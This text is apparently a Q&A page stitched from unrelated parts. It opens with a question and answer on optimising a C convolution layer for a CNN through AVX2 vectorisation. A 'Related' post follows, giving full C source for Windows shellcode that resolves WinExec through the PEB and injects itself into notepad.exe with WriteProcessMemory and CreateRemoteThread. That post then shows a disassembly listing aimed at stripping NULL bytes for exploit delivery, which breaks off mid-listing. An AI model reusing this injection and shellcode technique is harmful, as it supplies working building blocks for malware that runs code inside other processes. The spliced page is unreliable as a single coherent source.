I have implemented a Convolutional Neural Network in C and have been studying what parts of it have the longest latency.
Based on my research, the massive amounts of matricial multiplication required by CNNs makes running them on CPUs and even GPUs very inefficient. However, when I actually profiled my code (on an unoptimized build) I found out that something other than the multiplication itself was the bottleneck of the implementation.
After turning on optimization (-O3 -march=native -ffast-math, gcc cross compiler), the Gprof result was the following:
Clearly, the convolution2D function takes the largest amount of time to run, followed by the batch normalization and depthwise convolution functions.
The convolution function in question looks like this:
void convolution2D(int isize, // width/height of input
int osize, // width/height of output
int ksize, // width/height of kernel
int stride, // shift between input pixels, between consecutive outputs
int pad, // offset between (0,0) pixels between input and output
int idepth, int odepth, // number of input and output channels
float idata[isize][isize][idepth],
float odata[osize][osize][odepth],
float kdata[odepth][ksize][ksize][idepth])
{
// iterate over the output
for (int oy = 0; oy < osize; ++oy) {
for (int ox = 0; ox < osize; ++ox) {
for (int od = 0; od < odepth; ++od) {
odata[oy][ox][od] = 0; // When you iterate multiple times without closing the program, this number would stack up to infinity, so we have to zero it out every time.
for (int ky = 0; ky < ksize; ++ky) {
for (int kx = 0; kx < ksize; ++kx) {
// map position in output and kernel to the input
int iy = stride * oy + ky - pad;
int ix = stride * ox + kx - pad;
// use only valid inputs
if (iy >= 0 && iy < isize && ix >= 0 && ix < isize)
for (int id = 0; id < idepth; ++id)
odata[oy][ox][od] += kdata[od][ky][kx][id] * idata[iy][ix][id];
}}
}}}
}
This is a design based on my previous question and most of the processing time should fall on the convolution itself: odata[oy][ox][od] += kdata[od][ky][kx][id] * idata[iy][ix][id];.
Using objdump -drwC -Mintel to take a look at the assembly code returns me the following:
0000000000007880 <convolution2D>:
7880: f3 0f 1e fa endbr64
7884: 55 push rbp
7885: 48 89 e5 mov rbp,rsp
7888: 41 57 push r15
788a: 41 56 push r14
788c: 41 55 push r13
788e: 41 54 push r12
7890: 53 push rbx
7891: 48 81 ec b0 00 00 00 sub rsp,0xb0
7898: ff 15 4a a7 00 00 call QWORD PTR [rip+0xa74a] # 11fe8 <mcount#GLIBC_2.2.5>
789e: 89 d3 mov ebx,edx
78a0: 89 55 a8 mov DWORD PTR [rbp-0x58],edx
78a3: 89 8d 74 ff ff ff mov DWORD PTR [rbp-0x8c],ecx
78a9: 49 63 d1 movsxd rdx,r9d
78ac: 48 63 cf movsxd rcx,edi
78af: 41 89 f2 mov r10d,esi
78b2: 89 b5 38 ff ff ff mov DWORD PTR [rbp-0xc8],esi
78b8: 49 63 c0 movsxd rax,r8d
78bb: 48 0f af ca imul rcx,rdx
78bf: 48 63 75 10 movsxd rsi,DWORD PTR [rbp+0x10]
78c3: 49 89 d6 mov r14,rdx
78c6: 4c 8d 24 95 00 00 00 00 lea r12,[rdx*4+0x0]
78ce: 41 89 fd mov r13d,edi
78d1: 49 89 cb mov r11,rcx
78d4: 48 89 8d 60 ff ff ff mov QWORD PTR [rbp-0xa0],rcx
78db: 49 63 ca movsxd rcx,r10d
78de: 4c 8d 0c b5 00 00 00 00 lea r9,[rsi*4+0x0]
78e6: 49 89 f0 mov r8,rsi
78e9: 48 0f af f1 imul rsi,rcx
78ed: 48 63 cb movsxd rcx,ebx
78f0: 4c 89 8d 48 ff ff ff mov QWORD PTR [rbp-0xb8],r9
78f7: 48 0f af d1 imul rdx,rcx
78fb: 48 8d 3c 95 00 00 00 00 lea rdi,[rdx*4+0x0]
7903: 45 85 d2 test r10d,r10d
7906: 0f 8e 73 02 00 00 jle 7b7f <convolution2D+0x2ff>
790c: 48 c1 ef 02 shr rdi,0x2
7910: 49 c1 e9 02 shr r9,0x2
7914: 48 89 7d c8 mov QWORD PTR [rbp-0x38],rdi
7918: 4c 89 e7 mov rdi,r12
791b: 4c 89 8d 58 ff ff ff mov QWORD PTR [rbp-0xa8],r9
7922: 48 c1 ef 02 shr rdi,0x2
7926: 48 89 bd 50 ff ff ff mov QWORD PTR [rbp-0xb0],rdi
792d: 45 85 c0 test r8d,r8d
7930: 0f 8e 49 02 00 00 jle 7b7f <convolution2D+0x2ff>
7936: 48 c1 e6 02 shl rsi,0x2
793a: 48 0f af d1 imul rdx,rcx
793e: 29 c3 sub ebx,eax
7940: 89 c7 mov edi,eax
7942: 48 89 b5 30 ff ff ff mov QWORD PTR [rbp-0xd0],rsi
7949: 48 8b 75 20 mov rsi,QWORD PTR [rbp+0x20]
794d: 48 89 85 68 ff ff ff mov QWORD PTR [rbp-0x98],rax
7954: f7 df neg edi
7956: 45 8d 7e ff lea r15d,[r14-0x1]
795a: 89 9d 70 ff ff ff mov DWORD PTR [rbp-0x90],ebx
7960: 89 bd 3c ff ff ff mov DWORD PTR [rbp-0xc4],edi
7966: 48 8d 0c 95 00 00 00 00 lea rcx,[rdx*4+0x0]
796e: 89 7d ac mov DWORD PTR [rbp-0x54],edi
7971: 89 5d d4 mov DWORD PTR [rbp-0x2c],ebx
7974: 48 89 4d 98 mov QWORD PTR [rbp-0x68],rcx
7978: 4a 8d 0c 9d 00 00 00 00 lea rcx,[r11*4+0x0]
7980: c7 45 80 00 00 00 00 mov DWORD PTR [rbp-0x80],0x0
7987: 48 89 75 88 mov QWORD PTR [rbp-0x78],rsi
798b: 41 8d 70 ff lea esi,[r8-0x1]
798f: 48 89 4d c0 mov QWORD PTR [rbp-0x40],rcx
7993: 48 8d 04 b5 04 00 00 00 lea rax,[rsi*4+0x4]
799b: c7 45 90 00 00 00 00 mov DWORD PTR [rbp-0x70],0x0
79a2: 48 89 85 28 ff ff ff mov QWORD PTR [rbp-0xd8],rax
79a9: 44 89 f0 mov eax,r14d
79ac: 45 89 ee mov r14d,r13d
79af: 41 89 c5 mov r13d,eax
79b2: 48 8b 85 28 ff ff ff mov rax,QWORD PTR [rbp-0xd8]
79b9: 48 03 45 88 add rax,QWORD PTR [rbp-0x78]
79bd: 48 c7 85 78 ff ff ff 00 00 00 00 mov QWORD PTR [rbp-0x88],0x0
79c8: c7 45 84 00 00 00 00 mov DWORD PTR [rbp-0x7c],0x0
79cf: c7 45 94 00 00 00 00 mov DWORD PTR [rbp-0x6c],0x0
79d6: 44 8b 95 70 ff ff ff mov r10d,DWORD PTR [rbp-0x90]
79dd: 48 89 45 b0 mov QWORD PTR [rbp-0x50],rax
79e1: 48 63 45 80 movsxd rax,DWORD PTR [rbp-0x80]
79e5: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
79ec: 48 0f af 85 60 ff ff ff imul rax,QWORD PTR [rbp-0xa0]
79f4: 48 89 85 40 ff ff ff mov QWORD PTR [rbp-0xc0],rax
79fb: 8b 85 3c ff ff ff mov eax,DWORD PTR [rbp-0xc4]
7a01: 89 45 d0 mov DWORD PTR [rbp-0x30],eax
7a04: 48 8b 45 88 mov rax,QWORD PTR [rbp-0x78]
7a08: 48 8b 9d 78 ff ff ff mov rbx,QWORD PTR [rbp-0x88]
7a0f: 4c 8d 04 98 lea r8,[rax+rbx*4]
7a13: 48 8b 45 28 mov rax,QWORD PTR [rbp+0x28]
7a17: 48 8b 5d 18 mov rbx,QWORD PTR [rbp+0x18]
7a1b: 48 89 45 b8 mov QWORD PTR [rbp-0x48],rax
7a1f: 48 63 45 84 movsxd rax,DWORD PTR [rbp-0x7c]
7a23: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
7a2a: 48 0f af 85 50 ff ff ff imul rax,QWORD PTR [rbp-0xb0]
7a32: 48 03 85 40 ff ff ff add rax,QWORD PTR [rbp-0xc0]
7a39: 48 8d 04 83 lea rax,[rbx+rax*4]
7a3d: 48 89 45 a0 mov QWORD PTR [rbp-0x60],rax
7a41: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7a4c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
7a50: 8b 45 a8 mov eax,DWORD PTR [rbp-0x58]
7a53: 41 c7 00 00 00 00 00 mov DWORD PTR [r8],0x0
7a5a: 45 31 db xor r11d,r11d
7a5d: 48 8b 5d a0 mov rbx,QWORD PTR [rbp-0x60]
7a61: 44 8b 4d ac mov r9d,DWORD PTR [rbp-0x54]
7a65: 85 c0 test eax,eax
7a67: 0f 8e 98 00 00 00 jle 7b05 <convolution2D+0x285>
7a6d: 0f 1f 00 nop DWORD PTR [rax]
7a70: 45 85 c9 test r9d,r9d
7a73: 78 7b js 7af0 <convolution2D+0x270>
7a75: 45 39 ce cmp r14d,r9d
7a78: 7e 76 jle 7af0 <convolution2D+0x270>
7a7a: 48 8b 45 b8 mov rax,QWORD PTR [rbp-0x48]
7a7e: 8b 55 d0 mov edx,DWORD PTR [rbp-0x30]
7a81: 48 89 de mov rsi,rbx
7a84: 4a 8d 3c 98 lea rdi,[rax+r11*4]
7a88: eb 13 jmp 7a9d <convolution2D+0x21d>
7a8a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
7a90: ff c2 inc edx
7a92: 4c 01 e7 add rdi,r12
7a95: 4c 01 e6 add rsi,r12
7a98: 44 39 d2 cmp edx,r10d
7a9b: 74 53 je 7af0 <convolution2D+0x270>
7a9d: 85 d2 test edx,edx
7a9f: 78 ef js 7a90 <convolution2D+0x210>
7aa1: 41 39 d6 cmp r14d,edx
7aa4: 7e ea jle 7a90 <convolution2D+0x210>
7aa6: 45 85 ed test r13d,r13d
7aa9: 7e e5 jle 7a90 <convolution2D+0x210>
7aab: c4 c1 7a 10 08 vmovss xmm1,DWORD PTR [r8]
7ab0: 31 c0 xor eax,eax
7ab2: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7abd: 0f 1f 00 nop DWORD PTR [rax]
7ac0: c5 fa 10 04 87 vmovss xmm0,DWORD PTR [rdi+rax*4]
7ac5: 48 89 c1 mov rcx,rax
7ac8: c5 fa 59 04 86 vmulss xmm0,xmm0,DWORD PTR [rsi+rax*4]
7acd: 48 ff c0 inc rax
7ad0: c5 f2 58 c8 vaddss xmm1,xmm1,xmm0
7ad4: c4 c1 7a 11 08 vmovss DWORD PTR [r8],xmm1
7ad9: 49 39 cf cmp r15,rcx
7adc: 75 e2 jne 7ac0 <convolution2D+0x240>
7ade: ff c2 inc edx
7ae0: 4c 01 e7 add rdi,r12
7ae3: 4c 01 e6 add rsi,r12
7ae6: 44 39 d2 cmp edx,r10d
7ae9: 75 b2 jne 7a9d <convolution2D+0x21d>
7aeb: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
7af0: 4c 03 5d c8 add r11,QWORD PTR [rbp-0x38]
7af4: 48 03 5d c0 add rbx,QWORD PTR [rbp-0x40]
7af8: 41 ff c1 inc r9d
7afb: 44 3b 4d d4 cmp r9d,DWORD PTR [rbp-0x2c]
7aff: 0f 85 6b ff ff ff jne 7a70 <convolution2D+0x1f0>
7b05: 48 8b 5d 98 mov rbx,QWORD PTR [rbp-0x68]
7b09: 49 83 c0 04 add r8,0x4
7b0d: 48 01 5d b8 add QWORD PTR [rbp-0x48],rbx
7b11: 4c 3b 45 b0 cmp r8,QWORD PTR [rbp-0x50]
7b15: 0f 85 35 ff ff ff jne 7a50 <convolution2D+0x1d0>
7b1b: 8b 9d 74 ff ff ff mov ebx,DWORD PTR [rbp-0x8c]
7b21: 8b 45 94 mov eax,DWORD PTR [rbp-0x6c]
7b24: 48 8b 8d 48 ff ff ff mov rcx,QWORD PTR [rbp-0xb8]
7b2b: 01 5d d0 add DWORD PTR [rbp-0x30],ebx
7b2e: 48 01 4d b0 add QWORD PTR [rbp-0x50],rcx
7b32: 01 5d 84 add DWORD PTR [rbp-0x7c],ebx
7b35: 48 8b 8d 58 ff ff ff mov rcx,QWORD PTR [rbp-0xa8]
7b3c: 41 01 da add r10d,ebx
7b3f: 48 01 8d 78 ff ff ff add QWORD PTR [rbp-0x88],rcx
7b46: ff c0 inc eax
7b48: 39 85 38 ff ff ff cmp DWORD PTR [rbp-0xc8],eax
7b4e: 74 08 je 7b58 <convolution2D+0x2d8>
7b50: 89 45 94 mov DWORD PTR [rbp-0x6c],eax
7b53: e9 ac fe ff ff jmp 7a04 <convolution2D+0x184>
7b58: 8b 4d 90 mov ecx,DWORD PTR [rbp-0x70]
7b5b: 48 8b b5 30 ff ff ff mov rsi,QWORD PTR [rbp-0xd0]
7b62: 01 5d d4 add DWORD PTR [rbp-0x2c],ebx
7b65: 01 5d ac add DWORD PTR [rbp-0x54],ebx
7b68: 01 5d 80 add DWORD PTR [rbp-0x80],ebx
7b6b: 48 01 75 88 add QWORD PTR [rbp-0x78],rsi
7b6f: 8d 41 01 lea eax,[rcx+0x1]
7b72: 39 4d 94 cmp DWORD PTR [rbp-0x6c],ecx
7b75: 74 08 je 7b7f <convolution2D+0x2ff>
7b77: 89 45 90 mov DWORD PTR [rbp-0x70],eax
7b7a: e9 33 fe ff ff jmp 79b2 <convolution2D+0x132>
7b7f: 48 81 c4 b0 00 00 00 add rsp,0xb0
7b86: 5b pop rbx
7b87: 41 5c pop r12
7b89: 41 5d pop r13
7b8b: 41 5e pop r14
7b8d: 41 5f pop r15
7b8f: 5d pop rbp
7b90: c3 ret
7b91: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7b9c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
For reference, I'm using an AMD Ryzen 7 CPU which uses Zen2 architecture. Here is its list of instructions (page 101).
I suspect that the data here points to a memory issue instead of simply the multiplication being the cause of the bottleneck.
Question:
How can I improve this code so that it does not cause a memory bottleneck?
I'm guessing this is actually a problem particular to my code, perhaps something related to the multidimensional arrays I'm using. If I instead used one big single-dimentional array for each variable, would the latency decrease?
Relevant information:
There are two ways I declare the variables that are passed to this function. The first is as a global variable (usually in a struct), the second is as dynamic allocation:
float (*arr)[x][y] = calloc(z, sizeof *arr);
Perhaps the order in which I declare these matrixes is not cache-friendly, but I am not sure how to re-order it.
Stride values for the previous function are always 1 or 2, usually 1.
Here is the output of valgrind --tool=cachegrind:
==430300== Cachegrind, a cache and branch-prediction profiler
==430300== Copyright (C) 2002-2017, and GNU GPL'd, by Nicholas Nethercote et al.
==430300== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==430300== Command: ./EmbeddedNet test 1
==430300== Parent PID: 170008
==430300==
--430300-- warning: L3 cache found, using its data for the LL simulation.
==430300==
==430300== I refs: 6,369,594,192
==430300== I1 misses: 4,271
==430300== LLi misses: 2,442
==430300== I1 miss rate: 0.00%
==430300== LLi miss rate: 0.00%
==430300==
==430300== D refs: 2,064,233,110 (1,359,003,131 rd + 705,229,979 wr)
==430300== D1 misses: 34,476,969 ( 19,010,839 rd + 15,466,130 wr)
==430300== LLd misses: 5,311,277 ( 1,603,955 rd + 3,707,322 wr)
==430300== D1 miss rate: 1.7% ( 1.4% + 2.2% )
==430300== LLd miss rate: 0.3% ( 0.1% + 0.5% )
==430300==
==430300== LL refs: 34,481,240 ( 19,015,110 rd + 15,466,130 wr)
==430300== LL misses: 5,313,719 ( 1,606,397 rd + 3,707,322 wr)
==430300== LL miss rate: 0.1% ( 0.0% + 0.5% )
Looking at the result of Cachegrind, it doesn't look like the memory is your bottleneck. The NN has to be stored in memory anyway, but if it's too large that your program's having a lot of L1 cache misses, then it's worth thinking to try to minimize L1 misses, but 1.7% of L1 (data) miss rate is not a problem.
So you're trying to make this run fast anyway. Looking at your code, what's happening at the most inner loop is very simple (load-> multiply -> add -> store), and it doesn't have any side effect other than the final store. This kind of code is easily parallelizable, for example, by multithreading or vectorizing. I think you'll know how to make this run in multiple threads seeing that you can write code with some complexity, and you asked in comments how to manually vectorize the code.
I will explain that part, but one thing to bear in mind is that once you choose to manually vectorize the code, it will often be tied to certain CPU architectures. Let's not consider non-AMD64 compatible CPUs like ARM. Still, you have the option of MMX, SSE, AVX, and AVX512 to choose as an extension for vectorized computation, and each extension has multiple versions. If you want maximum portability, SSE2 is a reasonable choice. SSE2 appeared with Pentium 4, and it supports 128-bit vectors. For this post I'll use AVX2, which supports 128-bit and 256-bit vectors. It runs fine on your CPU, and has reasonable portability these days, supported from Haswell (2013) and Excavator (2015).
The pattern you're using in the inner loop is called FMA (fused multiply and add). AVX2 has an instruction for this. Have a look at this function and the compiled output.
float fma_scl(float a, float b, float c) {
return a * b + c;
}
fma_scl:
vfmadd132ss xmm0, xmm2, xmm1
ret
You can see the calculation done with a single instruction.
We'll define a 256-bit vector type using GCC's vector extension.
typedef float Vec __attribute__((vector_size(32), aligned(32)));
Here's a vectorized fma function.
Vec fma_vec(Vec a, Vec b, Vec c) {
return a * b + c;
}
fma_vec:
vfmadd132ps ymm0, ymm2, ymm1
ret
The code above is semantically the same as the one below, but everything is done in a single instruction.
typedef struct {
float f[8];
} Vec_;
Vec_ fma_vec_(Vec_ a, Vec_ b, Vec_ c) {
Vec_ r;
for (unsigned i = 0; i < 8; ++i) {
r.f[i] = a.f[i] * b.f[i] + c.f[i];
}
return r;
}
I think you'll now get the idea of making code run faster by vectorization.
Here is a simple function that's somewhat similar to your inner loop.
void loopadd_scl(float *restrict a, float *restrict b, float *restrict c, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
a[i] = fma_scl(b[i], c[i], a[i]);
}
}
When you compile through GCC with -O3 -march=znver2, this is the output. It's huge. I'll explain below.
loopadd_scl:
test ecx, ecx
je .L25
lea eax, [rcx-1]
cmp eax, 6
jbe .L13
mov r8d, ecx
xor eax, eax
shr r8d, 3
sal r8, 5
.L9:
vmovups ymm1, YMMWORD PTR [rdi+rax]
vmovups ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovups YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp r8, rax
jne .L9
mov eax, ecx
and eax, -8
test cl, 7
je .L26
vzeroupper
.L8:
mov r9d, ecx
sub r9d, eax
lea r8d, [r9-1]
cmp r8d, 2
jbe .L11
mov r8d, eax
sal r8, 2
lea r10, [rdi+r8]
vmovups xmm0, XMMWORD PTR [rdx+r8]
vmovups xmm2, XMMWORD PTR [r10]
vfmadd132ps xmm0, xmm2, XMMWORD PTR [rsi+r8]
mov r8d, r9d
and r8d, -4
add eax, r8d
and r9d, 3
vmovups XMMWORD PTR [r10], xmm0
je .L25
.L11:
mov r8d, eax
sal r8, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rdx+r8]
vmovss xmm3, DWORD PTR [r9]
vfmadd132ss xmm0, xmm3, DWORD PTR [rsi+r8]
lea r8d, [rax+1]
vmovss DWORD PTR [r9], xmm0
cmp r8d, ecx
jnb .L25
sal r8, 2
add eax, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rsi+r8]
vmovss xmm4, DWORD PTR [r9]
vfmadd132ss xmm0, xmm4, DWORD PTR [rdx+r8]
vmovss DWORD PTR [r9], xmm0
cmp eax, ecx
jnb .L25
sal rax, 2
add rdi, rax
vmovss xmm0, DWORD PTR [rdx+rax]
vmovss xmm5, DWORD PTR [rdi]
vfmadd132ss xmm0, xmm5, DWORD PTR [rsi+rax]
vmovss DWORD PTR [rdi], xmm0
.L25:
ret
.L26:
vzeroupper
ret
.L13:
xor eax, eax
jmp .L8
Basically GCC doesn't know anything about n, so it's splitting the loop to 3 cases: n / 8 > 1, n / 4 > 1, n < 4. It first deals with the n / 8 > 1 part using 256-bit ymm registers. Then, it deals with n / 4 > 1 with 128-bit xmm registers. Finally, it deals with n < 4 with scalar ss instructions.
You can avoid this mess if you know n is a multiple of 8. I got a bit lazy now, so have a look at the code and the compiler output below and compare it with the above. I think you're smart enough to get the idea.
void loopadd_vec(Vec *restrict a, Vec *restrict b, Vec *restrict c, unsigned n) {
n /= 8;
for (unsigned i = 0; i < n; ++i) {
a[i] = fma_vec(b[i], c[i], a[i]);
}
}
loopadd_vec:
shr ecx, 3
je .L34
mov ecx, ecx
xor eax, eax
sal rcx, 5
.L29:
vmovaps ymm1, YMMWORD PTR [rdi+rax]
vmovaps ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovaps YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp rcx, rax
jne .L29
vzeroupper
.L34:
ret
}
Related
For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
void shell_code_start()
{
// Get the current process' PEB address
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
void print_shellcode(unsigned char* shellcode, int length)
{
printf("unsigned char shellcode[%d] = \n", length);
int i;
for (i = 0; i < length; i++)
{
if (i % 16 == 0)
{
printf("\"");
}
if (shellcode[i] == 0x00)
{
printf("\x1B[31m\\x%02x\033[0m", shellcode[i]);
}
else
{
printf("\\x%02x", shellcode[i]);
}
if ((i + 1) % 16 == 0)
{
printf("\"\n");
}
}
printf("\";\n");
}
DWORD GetNotepadPID()
{
DWORD dwPID = 0;
DWORD dwSize = 0;
DWORD dwProcesses[1024], cbNeeded;
if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
{
for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
{
if (dwProcesses[i] != 0)
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
if (hProcess)
{
TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
{
_tcslwr(szProcessName);
if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
{
dwPID = dwProcesses[i];
break;
}
}
CloseHandle(hProcess);
}
}
}
}
return dwPID;
}
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
// Get the handle of the notepad.exe process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
// Allocate memory for the shellcode in the notepad.exe process
LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write the shellcode to the allocated memory in the notepad.exe process
WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL);
// Create a remote thread in the notepad.exe process to execute the shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
// Wait for the remote thread to complete
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
}
int main(int argc, char* argv[])
{
unsigned int rel32 = 0;
// E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
// The next four bytes contain the 32-bit offset.
char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
// Calculate the relative offset of the jump instruction
rel32 = *(DWORD*)((char*)shell_code_start + 1);
// Get the actual starting address of the shellcode, by adding the relative offset to the address of the jump instruction
unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
// Get the actual end address of the shellcode by scanning the code looking for the ret instruction...
unsigned char *shell_code_end_real = shell_code_start_real;
while (*shell_code_end_real++ != RET_INSTRUCTION) {};
unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
// Copy the shellcode to the allocated memory and execute it...
LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
DWORD old_protect;
VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
jump_to_shellcode();
// Release the memory allocated for the shellcode
VirtualFree(shellcode_mem, sizeofshellcode, MEM_RELEASE);
// Print the shellcode in hex format
print_shellcode(shell_code_start_real, sizeofshellcode);
// Inject shellcode into the notepad.exe process
InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
